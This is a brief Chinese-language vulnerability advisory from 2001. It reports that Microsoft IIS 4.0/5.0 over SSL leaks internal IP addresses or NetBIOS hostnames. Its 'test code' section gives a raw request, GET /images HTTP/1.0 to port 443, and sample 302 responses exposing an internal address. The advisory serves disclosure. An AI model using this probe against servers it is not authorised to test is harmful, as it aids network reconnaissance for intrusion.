Microsoft-IIS 4.0 & 5.0 会泄露内部IP地址发布时间:2001-08-09 更新时间:2001-08-09 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 受影响系统 Microsoft IIS 4.0 running SSL详细描述 使用PERL(SSLeay)或者其他工具手工连接端口TCP/443,远程用户可以获得内部IP地址或者泄露机器网络节点主机名。 测试代码 1-使用普通SSL浏览器和找任意目录,如: https://www.target.com/images/icon.gif 2-使用兼容的SSL PERL脚本,执行对目标端口443执行如下命令: GET /images HTTP/1.0 3-会产生如下结果: HTTP/1.1 302 Object Moved Location: https://192.168.1.10/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx 或者 HTTP/1.1 302 Object Moved Location: https://netbiosname/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx 解决方案 尚无 相关信息 enquiries@ggs-au.com http://www.ggs-au.com |
